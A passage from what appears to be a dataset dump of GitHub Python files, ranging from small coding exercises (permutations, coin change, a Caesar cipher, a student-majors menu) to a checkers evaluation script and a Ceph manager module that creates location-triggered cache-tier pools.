2023\n\n@author: krishnarajmayya\n\"\"\"\n\nimport json\nwith open(\"shannon-radii.json\") as f:\n out = f.read()\n\nd = json.loads(out)\n\n# Enter Element, Charge, Coordination and one of - r_crystal, r_ionic, spin, remark\n\nprint(d['Br'])","repo_name":"krishnarajmayya/MLFreeEnergyPerorskites","sub_path":"predictingFE/data_preparation/collect_shannon_radii/read_shannon.py","file_name":"read_shannon.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74469312134","text":"'''\n\n[+]Temporal marker : 10:51 Hours | Saturday 28, 2020\n[+]Temporal marker untethered: 10:46 Hours | Sunday 29, 2020\n[+]Comments : Coulnd't solve in optimal setting\n Devised the basic approach using hint\n Couldn't implement the correct solution\n I was finally tired and used the editorial solution\n matter is closed now\n[+]Space Complexity : O(N)\n[+]Time Complexity : O(N)\n[+]Level : MEDIUM\n[+]Tread Speed : Relaxed\n[+]LINK : https://www.interviewbit.com/problems/nearest-smaller-element\n[+] Supplement Sources : N/A\n\n'''\n\n# TLE\ndef getPermutation_obsolete(A, B):\n import itertools as iter\n lis = [x for x in range(1, A+1)]\n ans = [x for x in iter.permutations(lis)][B-1]\n solution = \"\"\n for x in ans:\n solution += str(x)\n return solution\n\n#EDITORIAL SOLUTION\ndef getPermutation(n, k):\n import math\n lis = [x for x in range(1, n+1)]\n permutation = \"\"\n k -= 1\n while n > 0:\n n -= 1\n index, k = divmod(k,math.factorial(n))\n permutation += str(lis[index])\n lis = lis[:index]+lis[index+1:]\n return permutation\n\nif __name__ == '__main__':\n #print(permute([x for x in range(1,4)]))\n length = 4\n import math\n for index in range(1, math.factorial(length)+1):\n print(index,end=\" >> :\")\n print(getPermutation(length, index))\n #print(getPermutation(3,5))","repo_name":"AggarwalAnshul/Dynamic-Programming","sub_path":"InterviewBit/BackTracking/kth-permutation-sequence.py","file_name":"kth-permutation-sequence.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25177421967","text":"# 춘향이는 편의점 카운터에서 일한다.\n# 손님이 2원짜리와 5원짜리로만 거스름돈을 달라고 한다. 2원짜리 동전과 5원짜리 동전은 무한정 많이 가지고 있다. \n# 동전의 개수가 최소가 되도록 거슬러 주어야 한다. 거스름돈이 n인 경우, 최소 동전의 개수가 몇 개인지 알려주는 프로그램을 작성하시오.\n# 예를 들어, 거스름돈이 15원이면 5원짜리 3개를, 거스름돈이 14원이면 5원짜리 2개와 2원짜리 2개로 총 4개를, \n# 거스름돈이 13원이면 5원짜리 1개와 2원짜리 4개로 총 5개를 주어야 동전의 개수가 최소가 된다.\n\n# solution 1\ndef main():\n cash = int(input())\n print(greedy_solution(cash))\n\ndef greedy_solution(cash : int) :\n # 5의 배수인지 확인\n remained_five = cash % 5\n # 5의 나머지 값이 짝수일 때 공식\n change_formula = ((cash // 5) + (remained_five // 2))\n # 5의 배수일 경우 5로 나눈 값을 반환\n if remained_five == 0 :\n return cash // 5\n # 5로 나눈 나머지가 홀수일 경우 5원으로 처리 하려 하면 2원으로 나누었을때 0으로 떨어지지 않는다.\n elif remained_five % 2 != 0 :\n # 거슬러 줄 수 없는 1과 3은 예외처리\n if cash == 1 or cash == 3 :\n return -1\n # 2원 계산 식 -> 5의 나머지 값에 5를 더해 2로 나눈다.\n # 5원 계산 식 -> 5로 나눈 값에서 1을 뺀다.\n else : \n return (cash // 5 - 1) + ((remained_five + 5) // 2)\n # 5로 나눈 나머지가 짝수일 경우 5원으로 나눈 최소 값을 구하고 나머지에 2를 나누어도 0으로 떨어진다.\n else :\n return change_formula\n\nmain()\n\n\n# solution2\ndef main():\n cash = int(input())\n print(greedy_solution(cash))\n\ndef greedy_solution(cash : int) :\n cnt_change = 0\n while True :\n # 손님의 금액이 5의 배수이면 \n if cash % 5 == 0 :\n cnt_change += cash // 5\n break\n # 5의 배수가 안되면 2를 빼고 다시 계산\n else : \n cnt_change += 1\n cash -= 2\n # 금액이 0보다 작아지면\n if cash < 0 :\n return -1\n #그게 아니라면\n else :\n return cnt_change\n\nmain()\n\n'''\n1 = 0\n2 = t,1\n3 = 0\n4 = t,2\n5 = f,1\n6 = t,3\n7 = f,1 t,1\n8 = t,4\n9 = f,1 t,2\n10 = f,2\n11 = f,1 t,3\n12 = f,2 t,1\n13 = f,1 t,4\n14 = f,2 t,2\n15 = f,3\n16 = f,2 t,3\n17 = f,2 t,2\n\n\n'''\n\n\n","repo_name":"HeeHyun8102/Backend-Study","sub_path":"algorithm/유길상/1주차_Greedy/거스름돈.py","file_name":"거스름돈.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18519370511","text":"'''Name: Ben Gertz\n Course: CMPS 1500\n Lab Section: Tuesday 5-6.15 PM\n Assignment: Lab 4 Part 1\n Date: 10/2/2017\n This file contains functions for use in the program for lab four relating to dictionaries.\n get_menu_chioce(), get_menu_choice(str) -> int, this function gives a user choices for action, prompts a user to enter a choice, prints the choice and returns the choice as an integer.\n display(d), display(str) -> str, this function prints the name and major of everyone in the dictionary.\n'''\nmajors = {'Harry': 'Computer Science', 'Hermione': 'Mathematics', 'Ron': 'English'}\ndef get_menu_choice():\n print('Majors of College Students\\n---------------------------\\n1. Look up a student\\'s major\\n2. Add a new major\\n3. Change a major\\n4. Delete a major\\n5. Display all students\\n6. Quit the program')\n valid_choice = ['1', '2', '3', '4', '5', '6']\n choice = input('Enter your choice: ')\n while choice not in valid_choice:\n choice = input('Enter a valid choice: ')\n return int(choice)\ndef display(d):\n for key in d:\n print(key, 'is a wizard in', d[key])\n","repo_name":"bgert/Python","sub_path":"lab4pr1.py","file_name":"lab4pr1.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1936860216","text":"def caesar_cipher(text, shift):\n encrypted_text = ''\n for char in text:\n if char.isalpha():\n if char.islower():\n encrypted_text += chr(((ord(char) - ord('a') + shift) % 26) + ord('a'))\n else:\n encrypted_text += chr(((ord(char) - ord('A') + shift) % 26) + ord('A'))\n else:\n encrypted_text += char\n return encrypted_text\n\nmessage = input(\"Enter the message to encrypt: \")\nshift_amount = int(input(\"Enter the shift amount (1-25): \"))\nencrypted_message = caesar_cipher(message, shift_amount)\nprint(\"Encrypted message:\", encrypted_message)\n","repo_name":"AhMedMubarak20/Basic-Text-Encryption","sub_path":"Basic Text Encryption.py","file_name":"Basic Text Encryption.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"44530239433","text":"from torch.nn.modules.module import Module\nfrom torch.nn.functional import avg_pool2d, max_pool2d\n\n\nclass RoIAlignAvg(Module):\n def __init__(self, alignedHeight, alignedWidth, spatialScale):\n super(RoIAlignAvg, self).__init__()\n\n self.alignedWidth = int(alignedWidth)\n self.alignedHeight = int(alignedHeight)\n self.spatialScale = float(spatialScale)\n\n def forward(self, features, rois):\n x = RoIAlignFunction(self.alignedHeight + 1, self.alignedWidth + 1,\n self.spatialScale)(features, rois)\n return avg_pool2d(x, kernel_size=2, stride=1)\n","repo_name":"SharadDixit/Faster-R-CNN-PytorchImplementation-","sub_path":"ROI/RoIAlignAvg.py","file_name":"RoIAlignAvg.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22768914155","text":"from checker_helpers import *\nfrom checker_minimax import *\nfrom play_checker import *\nimport matplotlib.pyplot as plt\n\ndef evaluate_minimax_checker(size):\n results = [play_checker(size, baseline, minimax) for i in range(100)]\n winner, player0_node_count, player1_node_count, player1_score, player2_score = zip(*results)\n return winner, player0_node_count, player1_node_count, player1_score, player2_score\n\nif __name__ == \"__main__\":\n experiment_result = {4:{0:0, 1:0, -1:0}, 6:{0:0, 1:0, -1:0}, 8:{0:0, 1:0, -1:0}, 10:{0:0, 1:0, -1:0}}\n figures = []\n i = 1\n for size in experiment_result.keys():\n winner, player0_node_count, player1_node_count, player1_score, player2_score = evaluate_minimax_checker(size)\n experiment_result[size][0] = winner.count(0)\n experiment_result[size][1] = winner.count(1)\n experiment_result[size][-1] = winner.count(-1)\n \n f = plt.figure(i)\n plt.subplot(2,3, 1)\n plt.hist(player0_node_count, 'auto')\n plt.xlabel('Baseline Node Count', fontsize = 14)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n\n plt.subplot(2,3, 2)\n plt.hist(player1_node_count, 'auto')\n plt.xlabel('Minimax Node Count', fontsize = 14)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n\n plt.subplot(2,3, 4)\n plt.hist(player1_score, 'auto')\n plt.xlabel('Baselin Final scores', fontsize = 14)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n\n plt.subplot(2,3, 5)\n plt.hist(player2_score, 'auto')\n plt.xlabel('Minimax Final scores', fontsize = 14)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n\n plt.subplot(2,3, 6)\n ratio = [experiment_result[size][0]/size, experiment_result[size][1]/size, experiment_result[size][-1]/size]\n labels = ['baseline Win', 'minimax Win', 'tie']\n plt.pie(ratio, labels=labels, autopct='%.1f%%', startangle=260, counterclock=False)\n \n figures.append(f)\n i += 1\n plt.show()\n\n for size, result in experiment_result.items():\n print (\"[ Size : %d ]\"%size)\n print(\"- player 0 win : %d times\"%result[0])\n print(\"- player 1 win : %d times\"%result[1])\n print(\"- tie : %d times\\n\"%result[-1])\n\n","repo_name":"wonkr/CIS667_project","sub_path":"evaluate_minimax_checker.py","file_name":"evaluate_minimax_checker.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18517040976","text":"import errno\nimport logging\nimport json\nimport subprocess\nimport time\nimport textwrap\nfrom threading import Event, Thread\n\nfrom mgr_module import MgrModule\n\nfrom geopy.geocoders import Nominatim \nfrom geopy.distance import geodesic\n\n# https://pythonhosted.org/python-geoip/\n# https://pypi.org/project/geopy/\n# https://github.com/maxmind/GeoIP2-python\n\nclass Module(MgrModule):\n COMMANDS = [\n {\n 'cmd': 'cache list pools',\n 'desc': \"List cache tier pools and status\",\n 'perm': 'r'\n },\n {\n 'cmd': 'cache list crush',\n 'desc': 'List backing pool and cache enabled crush rule associations',\n 'perm': 'r'\n },\n {\n 'cmd': 'cache list simulated',\n 'desc': 'List manual override locations',\n 'perm': 'r'\n },\n {\n 'cmd': 'cache list locations',\n 'desc': 'List crush rule and location associations',\n 'perm': 'r'\n },\n {\n 'cmd': 'cache add crush '\n 'name=crush_rule,type=CephString '\n 'name=pool_name,type=CephString ',\n 'desc': \"associate a backing pool with CRUSH rule to be used for cache pools\",\n 'perm': 'rw'\n },\n {\n 'cmd': 'cache remove crush '\n 'name=crush_rule,type=CephString '\n 'name=pool_name,type=CephString ',\n 'desc': \"Remove crush rule association from backing pool\",\n 'perm': 'rw'\n },\n {\n 'cmd': 'cache enable '\n 'name=crush_rule,type=CephString '\n 'name=enable,type=CephBool ',\n 'desc': \"enable cache tier creation on demand using given CRUSH rule\",\n 'perm': 'rw'\n },\n {\n 'cmd': 'cache add location '\n 'name=crush_rule,type=CephString '\n 'name=location,type=CephString '\n 'name=proximity,type=CephInt,req=false ',\n 'desc': \"associate location with CRUSH rule. May be given as lat/long pair or as an address string specific enough to lookup and identify region (state, city, zip, etc)\",\n 'perm': 'rw'\n },\n {\n 'cmd': 'cache simulate location '\n 'name=location,type=CephString ',\n 'desc': \"Simulate response as if traffic were exceeding threshold(s) for location\",\n 'perm': 'rw'\n },\n {\n 'cmd': 'cache no simulate location '\n 'name=location,type=CephString ',\n 'desc': \"Stop simulating high client traffic from specified location (specify lat,lon as listed in 'cache list location')\",\n 'perm': 'rw'\n },\n\n ]\n\n MODULE_OPTIONS = [\n {\n 'name': 'traffic_threshold_bytes',\n 'desc': 'avg bytes/s of traffic to create or remove cache tiers',\n 'type': 'int',\n 'runtime': True\n },\n {\n 'name': 'traffic_threshold_ratio',\n 'desc': 'ratio of traffic from geoip block vs other traffic to create or remove cache tiers',\n 'type': 'int',\n 'runtime': True\n },\n {\n 'name': 'default_cache_size',\n 'type': 'int',\n 'default': 1024,\n 'desc': 'default max size in MB for for cache pools (converted to bytes to set target_max_bytes). Default 1024MB',\n 'runtime': True\n },\n {\n 'name': 'default_cache_objects',\n 'type': 'int',\n 'default': 0,\n 'desc': 'default max objects for cache pools (sets target_max_objects). Default is disabled (0)',\n 'runtime': True\n },\n {\n 'name': 'proximity',\n 'desc': 'Max client distance in miles from cache tier location which will trigger new tier creation',\n 'type': 'int',\n 'default': 100,\n 'runtime': True\n },\n {\n 'name': 'cooldown_duration',\n 'desc': 'how long to leave cache tier in place after thresholds are no longer met (seconds), default 1800 (30 mins), 0 to disable automatic removal',\n 'type': 'int',\n 'default': 10,\n # 'default': 1800,\n 'runtime': True\n },\n {\n 'name': 'min_size',\n 'type': 'int',\n 'default': 2,\n 'desc': 'default min_size for new cache pools',\n 'runtime': True\n },\n {\n 'name': 'size',\n 'type': 'int',\n 'default': 3,\n 'desc': 'default size (replicas) for new cache pools',\n 'runtime': True\n },\n {\n 'name': 'pg_num',\n 'type': 'int',\n 'default': 4,\n 'desc': 'default pg_num for new cache pools',\n 'runtime': True\n },\n {\n 'name': 'suffix',\n 'type': 'str',\n 'default': '.cache',\n 'desc': 'suffix appended to new cache tier pools (name will be backing pool name + suffix)',\n 'runtime': True\n },\n\n ]\n\n def __init__(self, *args, **kwargs):\n super(Module, self).__init__(*args, **kwargs)\n self.geolocator = Nominatim(user_agent=\"osiris-ceph-mgr-cachetier\")\n self.interval = 60\n self.event = Event()\n self.workers = dict()\n self.suffix = self.get_module_option('suffix')\n self.cooldown = self.get_module_option('cooldown_duration')\n self.proximity = self.get_module_option('proximity')\n self.pg_num = self.get_module_option('pg_num')\n self.run = True\n # self.tasks = queue.Queue(maxsize=100)\n # queue for tasks\n # self.queue = Queue.Queue(maxsize=100)\n\n # location = geolocator.reverse(\"52.509669, 13.376294\")\n # location = geolocator.geocode(\"175 5th Avenue NYC\")\n # might need this...\n # self._background_jobs = Queue.Queue()\n\n def serve(self):\n self.log.info('Starting cachetier module')\n while self.run:\n self.poll_traffic()\n self.manage_cache()\n self.log.info(\"Finished traffic poll and cache management loop, sleeping for {} seconds\".format(self.interval))\n self.event.wait(self.interval)\n\n def shutdown(self):\n self.log.info('Stopping cachetier module')\n self.run = False\n self.event.set()\n \n def handle_command(self, inbuf, cmd):\n handler_name = \"_cmd_\" + cmd['prefix'].replace(\" \", \"_\")\n try:\n handler = getattr(self, handler_name)\n except AttributeError:\n return -errno.EINVAL, \"\", \"Unknown command\"\n\n return handler(inbuf, cmd)\n\n # not built into MgrModule for some reason...\n def get_pretty_footer(self, width):\n # dash line\n ret = '+'\n ret += '-' * (width - 1) + '+'\n ret += '\\n'\n return ret\n\n def _cmd_cache_list_crush(self,inbuf,cmd):\n stored_pools = self.fetch('cache_assoc')\n ret = ''\n ret += self.get_pretty_header(('Pool', 'Cache Targets (crush rules)'), 80)\n for pool in stored_pools:\n for crush in stored_pools[pool]:\n ret += self.get_pretty_row((pool,crush), 80) + '\\n'\n\n ret += self.get_pretty_footer(80)\n return (0, '', ret)\n # ({'backing_pool': pool, 'cache_pool': \"{}.{}\".format(pool, self.suffix) , 'state': 'active', 'timestamp': time.time() })\n\n def _cmd_cache_list_locations(self,inbuf,cmd):\n stored_loc = self.fetch('loc_assoc')\n ret = ''\n ret += self.get_pretty_header((\"Crush - Lat/Lon - Proximity\", \"Location Desc\"), 80)\n\n for crush_rule in stored_loc:\n for ldata in stored_loc[crush_rule]:\n lat = ldata[0]\n lon = ldata[1]\n prox = ldata[2]\n latlon = \"{},{}\".format(lat,lon)\n location = self.geolocator.reverse((lat,lon)).address.encode('utf-8')\n cell1 = (crush_rule, latlon, '{} Miles'.format(prox))\n cell2 = textwrap.wrap(location, width=40)\n for idx in range(0, len(cell2)):\n if idx < len(cell1):\n row_elem = cell1[idx]\n else:\n row_elem = ''\n ret += self.get_pretty_row((row_elem, cell2[idx]), 80) + '\\n'\n ret += self.get_pretty_footer(80)\n return (0, '', ret)\n \n def _cmd_cache_list_pools(self,inbuf,cmd):\n stored_active = self.fetch('cache_active')\n ret = ''\n ret += self.get_pretty_header(('Pool', 'Cache Pool', 'Crush', 'Status', 'Created'), 80)\n\n for crush_rule in stored_active:\n ret = ''\n for cache_info in stored_active[crush_rule]:\n time = time.localtime(cache_info['timestamp']).strftime(\"%m-%d-%y %H:%M:%S %Z\")\n row_elems = (cache_info['backing_pool'], cache_info['cache_pool'], crush_rule, cache_info['state'], time)\n ret += self.get_pretty_row(row_elems, 80) + '\\n'\n ret += self.get_pretty_footer(80)\n\n return (0, '', ret)\n\n def _cmd_cache_list_simulated(self,inbuf,cmd):\n stored_override = self.fetch('loc_override')\n ret = ''\n ret += self.get_pretty_header(('Lat/Lon', 'Identifier'), 80)\n for loc in stored_override:\n latlon = \"{},{}\".format(loc[0],loc[1])\n # ret += latlon\n # if we don't explicitely encode utf-8 here we get an 'ordinal not in range' exception printing out the address\n # UnicodeEncodeError: 'ascii' codec can't encode character u'\\xa0' in position 41: ordinal not in range(128)\n location = self.geolocator.reverse(loc).address.encode('utf-8')\n location = textwrap.wrap(location, width=38)\n for location_line in location:\n elems = (latlon,location_line)\n # only print this on first line\n latlon = ''\n ret += self.get_pretty_row(elems, 80) + '\\n'\n ret += self.get_pretty_footer(80)\n\n return (0, '', ret)\n\n # return 3-tuple result code, output buffer, informative string\n def _cmd_cache_add_crush(self,inbuf,cmd):\n\n # check if already set before fetching data from cluster\n stored_pools = self.fetch('cache_assoc')\n\n if cmd['pool_name'] in stored_pools:\n if cmd['crush_rule'] in stored_pools[cmd['pool_name']]:\n return (0,\"\",\"Association of {} with crush root {} already set\".format(cmd['pool_name'],cmd['crush_rule']))\n\n # tree = self.get('osd_map_tree')\n osdmap = self.get_osdmap()\n crushmap = osdmap.get_crush().dump()\n\n for pool_id, pool in osdmap.get_pools().items():\n if pool['pool_name'] == cmd['pool_name']:\n # pool exists\n for rule in crushmap['rules']:\n if rule['rule_name'] == cmd['crush_rule']:\n stored_pools.setdefault(cmd['pool_name'],[]).append(cmd['crush_rule'])\n self.set_store('cache_assoc', json.dumps(stored_pools))\n return (0,\"\",\"Associated {} with crush rule {} for cache overlays\".format(cmd['pool_name'],cmd['crush_rule']))\n return (-errno.EINVAL, \"\", \"Pool or crush rule does not exist\")\n\n def _cmd_cache_remove_crush(self,inbuf,cmd):\n stored_pools = self.fetch('cache_assoc')\n if cmd['pool_name'] in stored_pools:\n if cmd['crush_rule'] in stored_pools[cmd['pool_name']]:\n stored_pools[cmd['pool_name']].remove(cmd['crush_rule'])\n self.store('cache_assoc', stored_pools)\n return (0,\"\",\"Association of {} with crush root {} removed\".format(cmd['pool_name'],cmd['crush_rule']))\n\n\n def _cmd_cache_add_location(self,inbuf,cmd):\n stored_loc = self.fetch('loc_assoc')\n\n location_geocode = self.geolocator.geocode(cmd['location'])\n\n if location_geocode == None:\n return self.hande_err('geocode', location=cmd['location'])\n\n if 'proximity' in cmd:\n setprox = cmd['proximity']\n else:\n setprox = self.proximity\n\n if cmd['crush_rule'] in stored_loc:\n for lat,lon,prox in stored_loc[cmd['crush_rule']]:\n if location_geocode.latitude == lat and location_geocode.longitude == lon:\n if prox == setprox:\n return(0,\"\", \"Location {},{} with proximity {} miles already associated with crush root {} (argument provided as {})\"\n .format(location_geocode.latitude, location_geocode.longitude, prox, cmd['crush_rule'], cmd['location']))\n else:\n stored_loc[cmd['crush_rule']].remove([lat,lon,prox])\n stored_loc[cmd['crush_rule']].append([lat,lon,setprox])\n self.store('loc_assoc', stored_loc)\n return(0,\"\",\"Location already associated - updated location proximity to {} miles\".format(setprox))\n\n osdmap = self.get_osdmap()\n crushmap = osdmap.get_crush().dump()\n\n for rule in crushmap['rules']:\n self.log.info(\"_cmd_cache_associate_location: crush rule {} being compared to user specified rule\".format(rule['rule_name']))\n # make sure it exists\n if rule['rule_name'] == cmd['crush_rule']:\n stored_loc[cmd['crush_rule']] = [[location_geocode.latitude, location_geocode.longitude, setprox]]\n self.store('loc_assoc', stored_loc)\n return (0,\"\", \"Location {},{} now associated with crush rule\") \n \n # {}\".format(location_geocode.latitude, location_geocode.longitude, rule['rule_name']))\n\n return (-errno.EINVAL, '', \"Crush rule {} not found\".format(cmd['crush_rule'])) \n\n def _cmd_cache_enable(self,inbuf,cmd):\n # verify there is a location association\n stored_loc = self.fetch('loc_assoc')\n if cmd['crush_rule'] in stored_loc:\n stored_enable = self.fetch('loc_enable')\n stored_enable[cmd['crush_rule']] = cmd['enable']\n self.store('loc_enable', stored_enable)\n return(0,\"\",\"Enabled cache creation for crush root {}\".format(cmd['crush_rule']))\n return(-errno.EINVAL, '',\"Crush root {} not found\".format(cmd['crush_rule'])) \n\n # set overide in datastore, will be picked up by traffic poller and applied\n def _cmd_cache_simulate_location(self,inbuf,cmd):\n return self.cache_simulate_location(cmd['location'], enable=True)\n\n def _cmd_cache_no_simulate_location(self,inbuf,cmd):\n return self.cache_simulate_location(cmd['location'], enable=False)\n\n # set overide in datastore, will be picked up by traffic poller and applied\n def cache_simulate_location(self,location, enable=True):\n stored_override = self.fetch('loc_override', default = 'list')\n\n location_geocode = self.geolocator.geocode(location)\n if location_geocode == None:\n return self.hande_err('geocode', location=location)\n\n if enable == True:\n if [location_geocode.latitude, location_geocode.longitude] not in stored_override:\n stored_override.append([location_geocode.latitude, location_geocode.longitude])\n rmsg = \"Simulating high traffic threshold for\"\n elif [location_geocode.latitude, location_geocode.longitude] in stored_override:\n stored_override.remove([location_geocode.latitude, location_geocode.longitude])\n rmsg = \"Stopped simulating traffic for\"\n else:\n return(-errno.EINVAL, '', 'Location not found in simulated locations')\n\n self.store('loc_override',stored_override)\n\n return (0, \"\", \"{} {},{} ({})\".format(rmsg,location_geocode.latitude, location_geocode.latitude, location_geocode.address.encode('utf-8')))\n\n def err_s(self, msg, pool=None,state=None,location=None):\n errmap = dict()\n errmap['geocode'] = (-errno.EINVAL, \"\", \"Location {} not found by geocode lookup\".format(location))\n errmap['poolstate'] = \"Setting cache pool {} state {} failed\".format(pool, state)\n\n return errmap[msg]\n \n def poll_traffic(self):\n \n self.log.info(\"Polling traffic\")\n\n #stored_loc\n # crush -> location list (lat,lon,prox) tuples\n\n # stored_pools\n # pools -> crush rule list\n\n #stored_loc = self.fetch('loc_assoc')\n # stored_assoc = self.fetch('cache_assoc')\n stored_loc = self.fetch('loc_assoc')\n stored_override = self.fetch('loc_override', default ='list')\n stored_active = self.fetch('cache_active')\n stored_pools = self.fetch('cache_assoc')\n\n self.log.info(\"poll_traffic: Retrieved stored cache status: {}\".format(stored_active))\n\n # we only care about crush rules that have pool associations\n\n for pool in stored_pools:\n for crush in stored_pools[pool]:\n self.log.info(\"poll_traffic: pool {}: associated cache crush rule {} being checked for any location association \".format(pool, crush))\n if crush in stored_loc:\n for loclist in stored_loc[crush]:\n lat = loclist[0]\n lon = loclist[1]\n prox = loclist[2]\n self.log.info(\"poll_traffic: pool {}: cache crush rule {} has association with location {},{} \".format(pool, crush, lat,lon))\n\n # pseudo code block for doing this with actual network data\n # query: traffic to OSD which are included in a crush rule associated with a location proximity\n # filter: sum of all traffic by location exceeding threshold\n # if location exceeds configured threshold add coordinates to network_locations list\n # combine that list with user over-ride locations \n # iterate through list and trigger cache startup state if a crush rule -> location association exists within proximity\n # any crush rule -> location associations not in list need to be marked as teardown if past timeout\n\n # ... but right now there is no real network data to include\n network_locations = []\n trigger_locations = stored_override + network_locations\n\n # mark active caches for teardown if cooldown exceeded (will be over-ridden by location trigger check)\n if crush in stored_active:\n for cache_info in stored_active[crush]:\n if cache_info['state'] == 'active' and (time.time() - cache_info['timestamp'] > self.cooldown):\n self.log.info(\"poll_trafic: cache pool {}: cooldown expired, marking for teardown\".format(cache_info['cache_pool']))\n cache_info['state'] = 'teardown'\n\n\n # check list of trigger locations and activate new caches if necessary\n for location in trigger_locations:\n distance = geodesic((lat,lon), location)\n\n # is the overide location within specified proximity to any stored location/crush association?\n if distance <= prox:\n self.log.info(\"poll_traffic: location {},{} triggered cache activation for pool {} using crush rule {}\".format(lat,lon, pool, crush))\n if crush in stored_active:\n for cache_info in stored_active[crush]:\n if cache_info['state'] == 'active':\n self.log.info(\"poll_traffic: Pool {} is already active\".format(cache_info['cache_pool']))\n # reset timestamp used for cooldown \n cache_info['timestamp'] = time.time()\n continue\n else:\n self.log.info(\"poll_traffic: Pool {} changed from state {} to state {}\".format(cache_info['cache_pool'], cache_info['state'], 'startup'))\n cache_info['timestamp'] = time.time()\n cache_info['state'] = 'startup'\n else:\n self.log.info(\"poll_traffic: Pool {} in crush {} added to stored status object with state 'startup'\".format(\"{}{}\".format(pool, self.suffix), crush))\n stored_active[crush] = [{'backing_pool': pool, 'cache_pool': \"{}{}\".format(pool, self.suffix) , 'state': 'startup', 'timestamp': time.time() }]\n\n # the only thing we change here is the cache active status\n self.log.info(\"poll_traffic: storing new changes to cache status\")\n self.store('cache_active', stored_active)\n\n def manage_cache(self):\n self.log.info(\"manage_cache: starting loop through status object\")\n \n stored_active = self.fetch('cache_active')\n\n for crush_rule in stored_active:\n self.log.info(\"Checking cache pools for rule {}\".format(crush_rule))\n for cache_info in stored_active[crush_rule]:\n # lindex = stored_active[crush_rule].index(cache_info)\n self.log.info(\"Pool {}: State is marked {}\".format(cache_info['cache_pool'],cache_info['state']))\n # cache is drained and ready for teardown\n if cache_info['state'] == 'empty':\n self.log.info(\"Pool {}: triggering removal\".format(cache_info['cache_pool']))\n\n if self.remove_cache(stored_active['cache_pool'], stored_active['backing_pool']):\n stored_active[crush_rule].remove(cache_info)\n else:\n # pool was not empty, reset the process\n self.log.info(\"Pool {}: not empty, resetting state to draining\".format(cache_info['cache_pool']))\n cache_info['state'] = 'draining'\n \n # cache is marked draining - check if empty\n if cache_info['state'] == 'draining':\n self.log.info(\"Pool {}: checking for drain thread active\".format(cache_info['cache_pool']))\n if cache_info['cache_pool'] in self.workers:\n thread = self.workers[cache_info['cache_pool']]\n if thread.is_alive():\n return\n else:\n self.log.info(\"Pool {}: drain thread complete, marking empty\".format(cache_info['cache_pool']))\n cache_info['state'] = 'empty'\n self.workers[cache_info['cache_pool']].remove()\n\n # no thread is working on draining it, set state back to 'teardown' and trigger flush again\n else:\n self.log.info(\"Pool {}: no thread is working on draining, resetting state to teardown\".format(cache_info['cache_pool']))\n cache_info['state'] = 'teardown'\n \n \n # cache is no longer required and should begin draining and teardown\n if cache_info['state'] == 'teardown': \n self.log.info(\"Pool {}: starting teardown/drain thread\".format(cache_info['cache_pool']))\n worker = Thread(target=self.flush_cache, args=(cache_info['cache_pool']))\n worker.setDaemon(True)\n worker.start()\n # wait for thread to initialize and begin flushing\n while worker.is_alive() and not self.event.wait():\n self.workers[cache_info['cache_pool']] = worker\n cache_info['state'] = 'draining'\n \n if cache_info['state'] != 'draining':\n self.log.error(self.err_s('poolstate', pool=cache_info['cache_pool'], state='draining'))\n\n # cache needs to started up\n if cache_info['state'] == 'startup':\n self.log.info(\"Pool {}: creating cache pool and setting state active\".format(cache_info['cache_pool']))\n # we may eventually need to incorporate options for min_size, max_size, etcs\n if self.create_cache(cache_pool=cache_info['cache_pool'], backing_pool=cache_info['backing_pool'], crush_rule=crush_rule):\n cache_info['state'] = 'active'\n else:\n self.log.error(self.err_s('poolstate', pool=cache_info['cache_pool'], state='active'))\n\n # stored_active[crush_rule][lindex] = cache_info\n\n # stored_active.setdefault(crush_rule, ()).append({'backing_pool': backing_pool, 'cache_pool': cache_pool, 'state': 'active' })\n self.log.info(\"Storing current cache_active status {}\".format(stored_active))\n self.store('cache_active', stored_active)\n\n # at this point I'm not quite sure how to check if a cache pool is actually \n # configured as an overlay so the best we can do is check that it exists \n # if ecprofile is provided then the pool type argument automatically changes to erasure\n # if pg_num is not provided the module global default setting is used\n def create_cache(self,cache_pool,backing_pool,crush_rule, pg_num=None,ecprofile=None, size=None, min_size=None, max_bytes=None, max_objects=None):\n self.log.info(\"create_cache: pool: {}, cache: {}, crush: {}\".format(backing_pool,cache_pool, crush_rule))\n\n if size == None:\n size = self.get_module_option('size')\n\n if min_size == None:\n min_size = self.get_module_option('min_size')\n\n if pg_num == None:\n pg_num = self.get_module_option('pg_num')\n\n if max_bytes == None:\n max_bytes = self.get_module_option('default_cache_size')\n\n if max_objects == None:\n max_objects = self.get_module_option('default_cache_objects')\n\n writeback = 'writeback'\n\n pool_cmd = { \"prefix\": \"osd pool create\",\n \"pool\": cache_pool,\n \"pg_num\": pg_num,\n \"pgp_num\": pg_num,\n \"pool_type\": 'replicated',\n \"rule\": crush_rule,\n \"size\": size\n }\n\n if ecprofile:\n pool_cmd['erasure_code_profile'] = ecprofile\n pool_cmd['pool_type'] = 'erasure'\n\n pool_min_size = {\n \"prefix\": \"osd pool set\",\n \"pool\": cache_pool,\n \"var\": \"min_size\",\n \"val\": str(min_size)\n }\n\n tier_add = { \n \"prefix\": \"osd tier add\",\n \"pool\" : backing_pool,\n \"tierpool\": cache_pool\n }\n\n cache_mode = {\n \"prefix\": \"osd tier cache-mode\",\n \"pool\": cache_pool,\n \"mode\": writeback,\n }\n\n set_overlay = {\n \"prefix\": \"osd tier set-overlay\",\n \"pool\": backing_pool,\n \"overlaypool\": 